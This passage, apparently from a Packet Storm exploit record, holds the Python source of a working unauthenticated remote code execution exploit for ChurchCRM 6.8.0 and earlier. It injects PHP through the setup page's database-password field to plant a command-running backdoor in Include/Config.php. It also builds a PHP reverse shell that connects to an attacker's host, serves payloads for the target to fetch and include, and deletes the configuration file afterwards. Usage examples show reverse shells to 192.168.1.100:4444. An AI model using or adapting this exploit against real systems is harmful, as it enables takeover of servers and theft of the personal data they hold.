self._clean_version(version_string)\n            self.parts = self._parse_parts(self.clean)\n            self.suffix = self._extract_suffix(version_string)\n        \n        def _clean_version(self, version: str) -> str:\n            \"\"\"Clean version string\"\"\"\n    \n            match = re.search(r'(\\d+\\.\\d+(?:\\.\\d+)?)', version)\n            return match.group(1) if match else '0.0.0'\n        \n        def _parse_parts(self, version: str) -> List[int]:\n            \"\"\"Parse version into integer parts\"\"\"\n            parts = []\n            for part in version.split('.'):\n                try:\n                    parts.append(int(part))\n                except ValueError:\n                    parts.append(0)\n            return parts\n        \n        def _extract_suffix(self, version: str) -> str:\n            \"\"\"Extract suffix (e.g., -beta2, -RC1)\"\"\"\n            match = re.search(r'[-_]([a-zA-Z]+\\d*)$', version)\n            return match.group(1) if match else ''\n        \n        def __lt__(self, other: Union[str, 'Version']) -> bool:\n            \"\"\"Less than comparison\"\"\"\n            if isinstance(other, str):\n                other = Version(other)\n            for i in range(max(len(self.parts), len(other.parts))):\n                v1 = self.parts[i] if i < len(self.parts) else 0\n                v2 = other.parts[i] if i < len(other.parts) else 0\n                \n                if v1 < v2:\n                    return True\n                if v1 > v2:\n                    return False\n    \n            if self.suffix and not other.suffix:\n                return True  # Has suffix is considered older\n            if not self.suffix and other.suffix:\n                return False\n            \n            return False\n        \n        def __le__(self, other: Union[str, 'Version']) -> bool:\n            \"\"\"Less than or equal\"\"\"\n            return self < other or self == other\n        \n        def __eq__(self, other: Union[str, 'Version']) -> bool:\n            \"\"\"Equal comparison\"\"\"\n            if isinstance(other, str):\n                other = Version(other)\n            return self.parts == other.parts and self.suffix == other.suffix\n        \n        def __str__(self) -> str:\n            return self.original\n        \n        def __repr__(self) -> str:\n            return f\"Version('{self.original}')\"\n    \n    def safe_urljoin(base: str, path: str) -> str:\n        \"\"\"\n        Safely join URL parts handling base paths correctly\n        \n        Examples:\n        >>> safe_urljoin('http://example.com/churchcrm', '/setup/')\n        'http://example.com/churchcrm/setup/'\n        >>> safe_urljoin('http://example.com/churchcrm/', 'setup/')\n        'http://example.com/churchcrm/setup/'\n        \"\"\"\n        base = base.rstrip('/')\n    \n        if path.startswith('/'):\n            parsed = urlparse(base)\n            base_without_path = f\"{parsed.scheme}://{parsed.netloc}\"\n            base_path = parsed.path.rstrip('/')\n            return f\"{base_without_path}{base_path}{path}\"\n        else:\n            return f\"{base}/{path.lstrip('/')}\"\n    \n    \n    def normalize_url(url: str) -> str:\n        \"\"\"Normalize URL by adding scheme if missing and removing trailing slash\"\"\"\n        if not url.startswith(('http://', 'https://')):\n            url = 'http://' + url\n        return url.rstrip('/')\n    \n    \n    def parse_target(url: str) -> TargetInfo:\n        \"\"\"Parse target URL and return TargetInfo\"\"\"\n        url = normalize_url(url)\n        parsed = urlparse(url)\n        \n        return TargetInfo(\n            url=url,\n            base_path=parsed.path.rstrip('/') or '/',\n            scheme=parsed.scheme,\n            host=parsed.hostname,\n            port=parsed.port or (443 if parsed.scheme == 'https' else 80),\n        )\n    \n    \n    def discover_base_path(session: requests.Session, base_url: str, \n                           paths: List[str] = None, logger: logging.Logger = None) -> Optional[str]:\n        \"\"\"\n        Discover the correct base path by trying common paths\n        \"\"\"\n        if paths is None:\n            paths = DEFAULT_PATHS\n        \n        parsed = urlparse(base_url)\n        base = f\"{parsed.scheme}://{parsed.netloc}\"\n        \n        for path in paths:\n            test_url = f\"{base}{path}\" if path else base\n            try:\n                setup_url = safe_urljoin(test_url, '/setup/')\n                if logger:\n                    logger.debug(f\"Trying path: {setup_url}\")\n                \n                response = session.get(setup_url, timeout=5, allow_redirects=False)\n                \n                if response.status_code in [200, 301, 302]:\n                    if logger:\n                        logger.info(f\"Found ChurchCRM at: {test_url}\")\n                    return test_url\n            except:\n                continue\n        \n        return None\n    \n    class ColoredFormatter(logging.Formatter):\n        \"\"\"Custom formatter with colors\"\"\"\n        \n        COLORS = {\n            'DEBUG': '\\033[36m',      \n            'INFO': '\\033[32m',       \n            'WARNING': '\\033[33m',   \n            'ERROR': '\\033[31m',     \n            'CRITICAL': '\\033[35m',    \n            'RESET': '\\033[0m'         \n        }\n        \n        def format(self, record):\n            levelname = record.levelname\n            if levelname in self.COLORS:\n                record.levelname = f\"{self.COLORS[levelname]}{levelname}{self.COLORS['RESET']}\"\n            return super().format(record)\n    \n    \n    def setup_logger(debug: bool = False) -> logging.Logger:\n        \"\"\"Setup logger with appropriate configuration\"\"\"\n        logger = logging.getLogger('churchcrm_exploit')\n        logger.setLevel(logging.DEBUG if debug else logging.INFO)\n        \n        if not logger.handlers:\n            handler = logging.StreamHandler(sys.stdout)\n            formatter = ColoredFormatter(\n                '%(asctime)s [%(levelname)s] %(message)s',\n                datefmt='%H:%M:%S'\n            )\n            handler.setFormatter(formatter)\n            logger.addHandler(handler)\n        \n        return logger\n    \n    def create_session(retries: int = MAX_RETRIES) -> requests.Session:\n        \"\"\"Create requests session with retry logic\"\"\"\n        session = requests.Session()\n        \n        retry_strategy = Retry(\n            total=retries,\n            backoff_factor=0.5,\n            status_forcelist=[500, 502, 503, 504],\n            allowed_methods=[\"HEAD\", \"GET\", \"OPTIONS\", \"POST\"]\n        )\n        \n        adapter = HTTPAdapter(max_retries=retry_strategy)\n        session.mount(\"http://\", adapter)\n        session.mount(\"https://\", adapter)\n        \n        session.headers.update({\n            'User-Agent': USER_AGENT,\n            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n            'Accept-Language': 'en-US,en;q=0.5',\n            'Accept-Encoding': 'gzip, deflate',\n            'Connection': 'keep-alive',\n        })\n        \n        return session\n    \n    def random_string(length: int = 8) -> str:\n        \"\"\"Generate random string\"\"\"\n        return ''.join(random.choices(string.ascii_lowercase, k=length))\n    \n    \n    def random_int_string(min_len: int = 5, max_len: int = 10) -> str:\n        \"\"\"Generate random integer as string\"\"\"\n        length = random.randint(min_len, max_len)\n        return ''.join(random.choices(string.digits, k=length))\n    \n    \n    def random_url() -> str:\n        \"\"\"Generate random URL\"\"\"\n        return f\"http://{random_string(8)}.com/\"\n    \n    class PayloadHandler(http.server.SimpleHTTPRequestHandler):\n        \"\"\"HTTP handler for serving payloads\"\"\"\n        \n        payload = None\n        logger = None\n        request_count = 0\n        \n        def do_GET(self):\n            \"\"\"Handle GET request\"\"\"\n            PayloadHandler.request_count += 1\n            \n            if self.logger:\n                self.logger.debug(f\"Payload request #{PayloadHandler.request_count} from {self.client_address[0]}\")\n            \n            if self.payload:\n                self.send_response(200)\n                self.send_header('Content-Type', 'application/x-httpd-php')\n                self.send_header('Content-Length', str(len(self.payload)))\n                self.send_header('Pragma', 'no-cache')\n                self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')\n                self.end_headers()\n                self.wfile.write(self.payload.encode())\n                \n                if self.logger:\n                    self.logger.info(f\"Served payload to {self.client_address[0]}\")\n            else:\n                self.send_response(404)\n                self.end_headers()\n        \n        def log_message(self, format, *args):\n            \"\"\"Override to use our logger\"\"\"\n            if self.logger and self.logger.isEnabledFor(logging.DEBUG):\n                self.logger.debug(f\"Payload server: {format % args}\")\n    \n    \n    class PayloadServer:\n        \"\"\"HTTP server for serving payloads\"\"\"\n        \n        def __init__(self, logger: logging.Logger, host: str = '0.0.0.0', port: int = 0):\n            self.logger = logger\n            self.host = host\n            self.port = port\n            self.server = None\n            self.thread = None\n            self.payload = None\n        \n        def start(self, payload: str) -> str:\n            \"\"\"Start payload server and return URL\"\"\"\n            self.payload = payload\n            PayloadHandler.payload = payload\n            PayloadHandler.logger = self.logger\n            PayloadHandler.request_count = 0\n            self.server = socketserver.TCPServer((self.host, self.port), PayloadHandler, bind_and_activate=False)\n            self.server.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n            self.server.server_bind()\n            self.server.server_activate()\n            self.port = self.server.server_address[1]\n            self.thread = threading.Thread(target=self.server.serve_forever)\n            self.thread.daemon = True\n            self.thread.start()\n            \n            server_url = f\"http://{self.get_local_ip()}:{self.port}/\"\n            self.logger.info(f\"Payload server started at {server_url}\")\n            \n            return server_url\n        \n        def stop(self):\n            \"\"\"Stop payload server\"\"\"\n            if self.server:\n                self.server.shutdown()\n                self.server.server_close()\n                self.logger.debug(f\"Payload server stopped (served {PayloadHandler.request_count} requests)\")\n        \n        def get_local_ip(self) -> str:\n            \"\"\"Get local IP address\"\"\"\n            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n            try:\n                s.connect(('10.255.255.255', 1))\n                ip = s.getsockname()[0]\n            except Exception:\n                ip = '127.0.0.1'\n            finally:\n                s.close()\n            return ip\n        \n        def wait_for_requests(self, timeout: int = 10) -> bool:\n            \"\"\"Wait for at least one request\"\"\"\n            start = time.time()\n            while time.time() - start < timeout:\n                if PayloadHandler.request_count > 0:\n                    return True\n                time.sleep(0.5)\n            return False\n    \n    class VersionDetector:\n        \"\"\"Detect ChurchCRM version from response\"\"\"\n        \n        def __init__(self, logger: logging.Logger):\n            self.logger = logger\n            self.patterns = [\n                (re.compile(r'CRM-VERSION:\\s*([0-9]+\\.[0-9]+(?:\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'header'),\n                (re.compile(r'<meta[^>]*name=[\"\\']version[\"\\'][^>]*content=[\"\\']([0-9]+\\.[0-9]+(?:\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'meta'),\n                (re.compile(r'<meta[^>]*content=[\"\\']([0-9]+\\.[0-9]+(?:\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)[^>]*name=[\"\\']version', re.I), 'meta'),\n                (re.compile(r'<!--\\s*ChurchCRM[^\\d]*([0-9]+\\.[0-9]+(?:\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'comment'),\n                (re.compile(r'ChurchCRM[^\\d]*([0-9]+\\.[0-9]+(?:\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'footer'),\n                (re.compile(r'window\\.ChurchCRM\\s*=\\s*\\{[^}]*version:\\s*[\"\\']([0-9]+\\.[0-9]+(?:\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'js'),\n                (re.compile(r'\"softwareVersion\"\\s*:\\s*\"([0-9]+\\.[0-9]+(?:\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'json'),\n                (re.compile(r'ChurchCRM[\\/\\s-]*([0-9]+\\.[0-9]+(?:\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'php'),\n            ]\n        \n        def detect(self, response: requests.Response) -> Optional[Version]:\n            \"\"\"Detect version from response\"\"\"\n            detected_versions = []\n            \n            if 'CRM-VERSION' in response.headers:\n                version = self._clean_version(response.headers['CRM-VERSION'])\n                if version:\n                    self.logger.debug(f\"Version found in header: {version}\")\n                    detected_versions.append(('header', version))\n    \n            if 'X-Powered-By' in response.headers:\n                match = re.search(r'ChurchCRM[\\/\\s-]*([0-9]+\\.[0-9]+(?:\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', \n                                 response.headers['X-Powered-By'], re.I)\n                if match:\n                    version = self._clean_version(match.group(1))\n                    if version:\n                        self.logger.debug(f\"Version found in X-Powered-By: {version}\")\n                        detected_versions.append(('x-powered', version))\n    \n            for pattern, source in self.patterns:\n                matches = pattern.findall(response.text)\n                for match in matches:\n                    if isinstance(match, tuple):\n                        match = match[0]\n                    version = self._clean_version(match)\n                    if version:\n                        self.logger.debug(f\"Version found in {source}: {version}\")\n                        detected_versions.append((source, version))\n            \n            if not detected_versions:\n                return None\n    \n            version_counts = {}\n            for source, version in detected_versions:\n                version_str = str(version)\n                version_counts[version_str] = version_counts.get(version_str, 0) + 1\n            \n            most_common = max(version_counts.items(), key=lambda x: x[1])\n            self.logger.debug(f\"Most common version: {most_common[0]} (appears {most_common[1]} times)\")\n            \n            return Version(most_common[0])\n        \n        def _clean_version(self, version: str) -> Optional[Version]:\n            \"\"\"Clean and validate version string\"\"\"\n            version = version.strip()\n    \n            match = re.search(r'([0-9]+\\.[0-9]+(?:\\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', version)\n            if match:\n                return Version(match.group(1))\n            \n            return None\n        \n        def is_vulnerable(self, version: Optional[Version]) -> Optional[bool]:\n            \"\"\"Check if version is vulnerable using enhanced comparison\"\"\"\n            if not version:\n                return None\n            \n            try:\n    \n                vulnerable = version <= '6.8.0'\n                \n                self.logger.debug(f\"Version {version} <= 6.8.0? {vulnerable}\")\n                return vulnerable\n                \n            except Exception as e:\n                self.logger.error(f\"Version comparison error: {e}\")\n                return None\n    \n    class ChurchCRMExploit:\n        \"\"\"ChurchCRM RCE Exploit\"\"\"\n        \n        def __init__(self, target_url: str, logger: logging.Logger, \n                     target_type: TargetType = TargetType.LINUX_CMD_STAGER,\n                     lhost: Optional[str] = None, lport: Optional[int] = None,\n                     payload: Optional[str] = None, verify_ssl: bool = True,\n                     proxy: Optional[str] = None, auto_discover: bool = True):\n            \n            self.logger = logger\n            self.original_url = target_url\n            self.target_type = target_type\n            self.lhost = lhost\n            self.lport = lport\n            self.custom_payload = payload\n            self.verify_ssl = verify_ssl\n            self.proxy = proxy\n            self.auto_discover = auto_discover\n            self.session = create_session()\n            self.payload_server = None\n            self.version_detector = VersionDetector(logger)\n            self.backdoor_injected = False\n            \n            if proxy:\n                self.session.proxies = {'http': proxy, 'https': proxy}\n    \n            self.target = self._initialize_target(target_url)\n        \n        def _initialize_target(self, target_url: str) -> TargetInfo:\n            \"\"\"Initialize target with optional path discovery\"\"\"\n    \n            try:\n                info = parse_target(target_url)\n    \n                test_url = safe_urljoin(info.url, '/setup/')\n                response = self.session.get(test_url, timeout=5, verify=self.verify_ssl, allow_redirects=False)\n                \n                if response.status_code in [200, 301, 302]:\n                    self.logger.info(f\"Target URL working: {info.url}\")\n                    info.detected_paths.append(info.base_path)\n                    return info\n            except:\n                pass\n    \n            if self.auto_discover:\n                self.logger.info(\"Direct URL not working, attempting path discovery...\")\n                discovered = discover_base_path(self.session, target_url, logger=self.logger)\n                \n                if discovered:\n                    info = parse_target(discovered)\n                    info.detected_paths = DEFAULT_PATHS\n                    self.logger.info(f\"Discovered ChurchCRM at: {info.url}\")\n                    return info\n            return parse_target(target_url)\n        \n        def check(self) -> Dict[str, Any]:\n            \"\"\"Check if target is vulnerable\"\"\"\n            self.logger.info(f\"Checking target: {self.target.url}\")\n            \n            try:\n    \n                url = safe_urljoin(self.target.url, '/setup/')\n                self.logger.debug(f\"Accessing {url}\")\n                \n                response = self.session.get(\n                    url,\n                    timeout=TIMEOUT,\n                    verify=self.verify_ssl,\n                    allow_redirects=True\n                )\n                \n                self.logger.debug(f\"Response code: {response.status_code}\")\n                \n                if response.status_code not in [200, 301, 302]:\n                    self.logger.warning(f\"Unexpected response code: {response.status_code}\")\n                    return {\n                        'code': CheckCode.UNREACHABLE,\n                        'message': f'Setup page returned HTTP {response.status_code}'\n                    }\n    \n                version = self.version_detector.detect(response)\n                \n                if version:\n                    self.logger.info(f\"Detected ChurchCRM version: {version}\")\n                    vulnerable = self.version_detector.is_vulnerable(version)\n                    self.target.version = str(version)\n                    self.target.vulnerable = vulnerable\n                    \n                    if vulnerable:\n                        self.logger.warning(\"Target appears VULNERABLE!\")\n                        return {\n                            'code': CheckCode.VULNERABLE,\n                            'version': str(version),\n                            'message': f'Vulnerable version {version} detected'\n                        }\n                    else:\n                        self.logger.info(\"Target appears NOT vulnerable\")\n                        return {\n                            'code': CheckCode.SAFE,\n                            'version': str(version),\n                            'message': f'Version {version} is not vulnerable'\n                        }\n                else:\n                    self.logger.warning(\"Could not detect version\")\n                    return {\n                        'code': CheckCode.UNKNOWN,\n                        'message': 'Version unknown - setup page accessible'\n                    }\n                    \n            except RequestException as e:\n                self.logger.error(f\"Request failed: {e}\")\n                return {\n                    'code': CheckCode.UNREACHABLE,\n                    'message': f'Target unreachable: {e}'\n                }\n        \n        def build_payload(self) -> str:\n            \"\"\"Build payload based on target type\"\"\"\n            prefix = f\"{random_string(3)}';\"\n            \n            if self.target_type == TargetType.PHP_MEMORY:\n    \n                if self.custom_payload:\n                    php_payload = self.custom_payload\n                else:\n    \n                    php_payload = self._generate_reverse_shell()\n                \n                b64_payload = base64.b64encode(php_payload.encode()).decode()\n                return f\"{prefix} eval(base64_decode(\\\"{b64_payload}\\\")); //\"\n            \n            elif self.target_type == TargetType.PHP_FETCH:\n    \n                if not self.payload_server:\n                    raise PayloadServerError(\"Payload server not started\")\n                \n                payload_name = f\"/tmp/{random_string(8)}.php\"\n                server_url = f\"http://{self.lhost}:{self.payload_server.port}/\"\n                \n                return (f\"{prefix} $f='{payload_name}'; \"\n                       f\"file_put_contents($f, file_get_contents('{server_url}')); \"\n                       f\"register_shutdown_function('unlink', $f); include($f); //\")\n            \n            else:\n    \n                return f\"{prefix} system($_GET['cmd']); //\"\n        \n        def _generate_reverse_shell(self) -> str:\n            \"\"\"Generate PHP reverse shell\"\"\"\n            if not self.lhost or not self.lport:\n                return \"phpinfo();\"\n            \n            return f\"\"\"<?php\n    \n    $lhost = '{self.lhost}';\n    $lport = {self.lport};\n    \n    if (function_exists('fsockopen') && function_exists('proc_open')) {{\n        $sock = @fsockopen($lhost, $lport);\n        if ($sock) {{\n            $descriptors = array(\n                0 => $sock,\n                1 => $sock,\n                2 => $sock\n            );\n            $process = proc_open((PHP_OS == 'WINNT' ? 'cmd' : '/bin/sh'), $descriptors, $pipes);\n            proc_close($process);\n        }}\n    }}\n    \n    if (function_exists('socket_create') && function_exists('proc_open')) {{\n        $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\n        if ($sock && @socket_connect($sock, $lhost, $lport)) {{\n            $descriptors = array(\n                0 => $sock,\n                1 => $sock,\n                2 => $sock\n            );\n            $process = proc_open((PHP_OS == 'WINNT' ? 'cmd' : '/bin/sh'), $descriptors, $pipes);\n            proc_close($process);\n        }}\n    }}\n    ?>\"\"\"\n        \n        def inject_backdoor(self) -> bool:\n            \"\"\"Inject backdoor via setup page\"\"\"\n            self.logger.info(\"Injecting backdoor into Include/Config.php...\")\n            \n            payload = self.build_payload()\n            \n            post_data = {\n                'DB_SERVER_NAME': random_string(8),\n                'DB_SERVER_PORT': '3306',\n                'DB_NAME': random_string(8),\n                'DB_USER': random_string(6),\n                'DB_PASSWORD': payload,\n                'ROOT_PATH': '/',\n                'URL': random_url()\n            }\n            \n            self.logger.debug(f\"POST data prepared (password field contains payload)\")\n            \n            try:\n                url = safe_urljoin(self.target.url, '/setup/')\n                self.logger.debug(f\"Sending POST to {url}\")\n                \n                response = self.session.post(\n                    url,\n                    data=post_data,\n                    timeout=TIMEOUT,\n                    verify=self.verify_ssl,\n                    allow_redirects=False\n                )\n                \n                if response.status_code == 200:\n                    self.logger.info(\"Backdoor injected successfully!\")\n                    self.backdoor_injected = True\n                    return True\n                else:\n                    self.logger.error(f\"Injection failed with HTTP {response.status_code}\")\n                    return False\n                    \n            except RequestException as e:\n                self.logger.error(f\"Injection request failed: {e}\")\n                return False\n        \n        def execute_command(self, cmd: str) -> Optional[str]:\n            \"\"\"Execute command on target\"\"\"\n            if not self.backdoor_injected:\n                self.logger.warning(\"Backdoor not injected yet. Attempting injection...\")\n                if not self.inject_backdoor():\n                    self.logger.error(\"Cannot execute command: backdoor injection failed\")\n                    return None\n            \n            self.logger.info(f\"Executing command: {cmd}\")\n            \n            try:\n                url = safe_urljoin(self.target.url, '/')\n                self.logger.debug(f\"Command URL: {url}?cmd={quote(cmd)}\")\n                \n                response = self.session.get(\n                    url,\n                    params={'cmd': cmd},\n                    timeout=TIMEOUT,\n                    verify=self.verify_ssl\n                )\n                \n                if response.status_code == 200:\n    \n                    output = response.text.strip()\n    \n                    if '<html' in output.lower():\n    \n                        body_match = re.search(r'<body[^>]*>(.*?)</body>', output, re.S | re.I)\n                        if body_match:\n                            output = body_match.group(1).strip()\n    \n                        output = re.sub(r'<[^>]+>', ' ', output)\n                        output = re.sub(r'\\s+', ' ', output).strip()\n                    \n                    return output\n                else:\n                    self.logger.error(f\"Command execution failed with HTTP {response.status_code}\")\n                    return None\n                    \n            except RequestException as e:\n                self.logger.error(f\"Command execution request failed: {e}\")\n                return None\n        \n        def cleanup(self) -> bool:\n            \"\"\"Clean up - remove backdoor\"\"\"\n            if not self.backdoor_injected:\n                self.logger.debug(\"No backdoor to clean up\")\n                return True\n            \n            self.logger.info(\"Cleaning up...\")\n    \n            commands = [\n                'rm -f Include/Config.php',\n                'rm Include/Config.php',\n                'rm -f churchcrm/Include/Config.php',\n                'del /f Include\\\\Config.php',\n                'php -r \"unlink(\\'Include/Config.php\\');\"',\n                'php -r \"unlink(\\'churchcrm/Include/Config.php\\');\"'\n            ]\n            \n            success = False\n            for cmd in commands:\n                result = self.execute_command(cmd)\n                if result is not None:  # Command executed (even if file doesn't exist)\n                    self.logger.debug(f\"Cleanup command executed: {cmd}\")\n                    success = True\n            \n            if success:\n                self.logger.info(\"Cleanup completed\")\n                self.backdoor_injected = False\n            else:\n                self.logger.warning(\"Cleanup may have failed\")\n            \n            return success\n        \n        def run_cmd_stager(self, cmd: str) -> Tuple[bool, Optional[str]]:\n            \"\"\"Run command stager\"\"\"\n            output = self.execute_command(cmd)\n            return (output is not None, output)\n        \n        def run_php_memory(self) -> Tuple[bool, Optional[str]]:\n            \"\"\"Run PHP in-memory payload\"\"\"\n            self.logger.info(\"Executing PHP in-memory payload...\")\n    \n            try:\n                url = safe_urljoin(self.target.url, '/')\n                self.logger.debug(f\"Triggering payload via GET to {url}\")\n                \n                response = self.session.get(url, timeout=TIMEOUT, verify=self.verify_ssl)\n                \n                if response.status_code == 200:\n                    self.logger.info(\"PHP payload executed successfully\")\n    \n                    return (True, response.text[:500] + \"...\" if len(response.text) > 500 else response.text)\n                else:\n                    self.logger.error(f\"PHP execution failed with HTTP {response.status_code}\")\n                    return (False, None)\n                    \n            except RequestException as e:\n                self.logger.error(f\"PHP execution request failed: {e}\")\n                return (False, None)\n        \n        def run_php_fetch(self) -> Tuple[bool, Optional[str]]:\n            \"\"\"Run PHP fetch payload\"\"\"\n            self.logger.info(\"Executing PHP fetch payload...\")\n    \n            self.payload_server = PayloadServer(self.logger, host='0.0.0.0')\n            \n            if self.custom_payload:\n                payload = self.custom_payload\n            else:\n                payload = self._generate_reverse_shell()\n            \n            try:\n                server_url = self.payload_server.start(payload)\n                self.logger.info(f\"Serving payload from {server_url}\")\n    \n                time.sleep(2)\n    \n                if self.inject_backdoor():\n                    self.logger.info(\"Waiting for payload request...\")\n    \n                    if self.payload_server.wait_for_requests(timeout=30):\n                        self.logger.info(\"Payload was fetched by target\")\n    \n                        time.sleep(5)\n                        success = True\n                    else:\n                        self.logger.warning(\"No payload request received\")\n                        success = False\n                else:\n                    success = False\n                \n                return (success, None)\n                \n            finally:\n                self.payload_server.stop()\n        \n        def exploit(self) -> ExploitResult:\n            \"\"\"Main exploit method\"\"\"\n            self.logger.info(f\"Starting exploit against {self.target.url}\")\n            self.logger.info(f\"Target type: {self.target_type.value}\")\n    \n            check_result = self.check()\n            \n            if check_result['code'] == CheckCode.UNREACHABLE:\n                return ExploitResult(\n                    success=False,\n                    message=f\"Target unreachable: {check_result['message']}\"\n                )\n            \n            if check_result['code'] == CheckCode.SAFE:\n                return ExploitResult(\n                    success=False,\n                    message=check_result['message']\n                )\n    \n            if not self.inject_backdoor():\n                return ExploitResult(\n                    success=False,\n                    message=\"Failed to inject backdoor\"\n                )\n    \n            success = False\n            output = None\n            \n            if self.target_type == TargetType.LINUX_CMD_STAGER:\n                if self.custom_payload:\n                    success, output = self.run_cmd_stager(self.custom_payload)\n                else:\n    \n                    success, output = self.run_cmd_stager('id')\n                    if success and output:\n                        self.logger.info(f\"Command output: {output.strip()}\")\n            \n            elif self.target_type == TargetType.PHP_MEMORY:\n                success, output = self.run_php_memory()\n            \n            elif self.target_type == TargetType.PHP_FETCH:\n                success, output = self.run_php_fetch()\n    \n            self.cleanup()\n            \n            return ExploitResult(\n                success=success,\n                message=\"Exploit completed successfully\" if success else \"Exploit failed\",\n                target=self.target,\n                output=output\n            )\n    \n    \n    def main():\n        \"\"\"Main entry point\"\"\"\n        parser = argparse.ArgumentParser(\n            description='ChurchCRM Unauthenticated RCE Exploit by indoushka',\n            formatter_class=argparse.RawDescriptionHelpFormatter,\n            epilog=\"\"\"\n    Examples:\n      # Check vulnerability\n      %(prog)s http://target.com/churchcrm --check\n      \n      # Execute command\n      %(prog)s http://target.com --cmd \"id\"\n      \n      # Reverse shell (Linux)\n      %(prog)s http://target.com --reverse 192.168.1.100 4444\n      \n      # Reverse shell with PHP fetch method\n      %(prog)s http://target.com --type php-fetch --reverse 192.168.1.100 4444\n      \n      # Custom PHP payload\n      %(prog)s http://target.com --payload \"<?php phpinfo(); ?>\"\n      \n      # With proxy and debug\n      %(prog)s http://target.com --check --proxy http://127.0.0.1:8080 --debug\n      \n    Exit codes:\n      0 - Not vulnerable / Success\n      1 - Error / Unknown\n      2 - Vulnerable\n            \"\"\"\n        )\n        \n        parser.add_argument('target', help='Target URL (e.g., http://target.com/churchcrm)')\n    \n        parser.add_argument('--check', action='store_true', help='Check if target is vulnerable')\n        parser.add_argument('--cmd', metavar='COMMAND', help='Execute command')\n        parser.add_argument('--reverse', nargs=2, metavar=('LHOST', 'LPORT'), \n                          help='Reverse shell (LHOST LPORT)')\n        parser.add_argument('--payload', metavar='CODE', help='Custom PHP payload')\n        parser.add_argument('--payload-file', metavar='FILE', help='PHP payload file')\n        parser.add_argument('--type', choices=['linux', 'php-memory', 'php-fetch'], \n                           default='linux', help='Target type (default: linux)')\n        parser.add_argument('--proxy', help='HTTP proxy (e.g., http://127.0.0.1:8080)')\n        parser.add_argument('--no-verify', action='store_true', help='Disable SSL verification')\n        parser.add_argument('--debug', action='store_true', help='Enable debug output')\n        parser.add_argument('--no-discover', action='store_true', \n                           help='Disable automatic path discovery')\n        \n        args = parser.parse_args()\n    \n        logger = setup_logger(args.debug)\n    \n        if not any([args.check, args.cmd, args.reverse, args.payload, args.payload_file]):\n            logger.error(\"No action specified. Use --help for usage.\")\n            sys.exit(1)\n    \n        target_type_map = {\n            'linux': TargetType.LINUX_CMD_STAGER,\n            'php-memory': TargetType.PHP_MEMORY,\n            'php-fetch': TargetType.PHP_FETCH\n        }\n        target_type = target_type_map[args.type]\n    \n        payload = None\n        if args.payload:\n            payload = args.payload\n        elif args.payload_file:\n            try:\n                with open(args.payload_file, 'r') as f:\n                    payload = f.read()\n            except Exception as e:\n                logger.error(f\"Failed to read payload file: {e}\")\n                sys.exit(1)\n    \n        try:\n            exploit = ChurchCRMExploit(\n                target_url=args.target,\n                logger=logger,\n                target_type=target_type,\n                lhost=args.reverse[0] if args.reverse else None,\n                lport=int(args.reverse[1]) if args.reverse else None,\n                payload=payload,\n                verify_ssl=not args.no_verify,\n                proxy=args.proxy,\n                auto_discover=not args.no_discover\n            )\n        except Exception as e:\n            logger.error(f\"Failed to initialize exploit: {e}\")\n            if args.debug:\n                import traceback\n                traceback.print_exc()\n            sys.exit(1)\n    \n        try:\n            if args.check:\n                result = exploit.check()\n                if result['code'] == CheckCode.VULNERABLE:\n                    logger.warning(f\"Target is VULNERABLE! Version: {result.get('version', 'unknown')}\")\n                    sys.exit(2)\n                elif result['code'] == CheckCode.SAFE:\n                    logger.info(\"Target is NOT vulnerable\")\n                    sys.exit(0)\n                else:\n                    logger.warning(f\"Unknown status: {result['message']}\")\n                    sys.exit(1)\n            \n            elif args.cmd:\n                logger.info(f\"Executing command: {args.cmd}\")\n    \n                if exploit.target_type != TargetType.LINUX_CMD_STAGER:\n                    logger.warning(f\"Switching target type from {exploit.target_type.value} to linux_cmd_stager\")\n                    exploit.target_type = TargetType.LINUX_CMD_STAGER\n                \n                result = exploit.exploit()\n                if result.success and result.output:\n                    print(\"\\n\" + \"=\"*60)\n                    print(\"COMMAND OUTPUT:\")\n                    print(\"=\"*60)\n                    print(result.output)\n                    print(\"=\"*60)\n                elif result.success:\n                    print(\"\\nCommand executed successfully (no output)\")\n                else:\n                    logger.error(f\"Command execution failed: {result.message}\")\n                    sys.exit(1)\n            \n            elif args.reverse:\n                logger.info(f\"Attempting reverse shell to {args.reverse[0]}:{args.reverse[1]}\")\n    \n                if args.type == 'php-fetch':\n                    exploit.target_type = TargetType.PHP_FETCH\n                elif args.type == 'php-memory':\n                    exploit.target_type = TargetType.PHP_MEMORY\n                else:\n                    exploit.target_type = TargetType.LINUX_CMD_STAGER\n                \n                result = exploit.exploit()\n                \n                if result.success:\n                    logger.info(\"Reverse shell payload sent. Check your listener!\")\n                    if result.output:\n                        print(f\"\\nOutput: {result.output}\")\n                else:\n                    logger.error(f\"Reverse shell failed: {result.message}\")\n                    sys.exit(1)\n            \n            else:\n                result = exploit.exploit()\n                if result.success:\n                    logger.info(\"Exploit completed successfully!\")\n                    if result.output:\n                        print(f\"\\nOutput: {result.output}\")\n                else:\n                    logger.error(f\"Exploit failed: {result.message}\")\n                    sys.exit(1)\n        \n        except KeyboardInterrupt:\n            logger.info(\"Interrupted by user\")\n            sys.exit(130)\n        except Exception as e:\n            logger.error(f\"Unexpected error: {e}\")\n            if args.debug:\n                import traceback\n                traceback.print_exc()\n            sys.exit(1)\n    \n    \n    if __name__ == '__main__':\n        main()\n    \t\t\n    Greetings to :======================================================================\n    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\n    ====================================================================================",
    "sourceHref": "https://packetstorm.news/download/215793",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
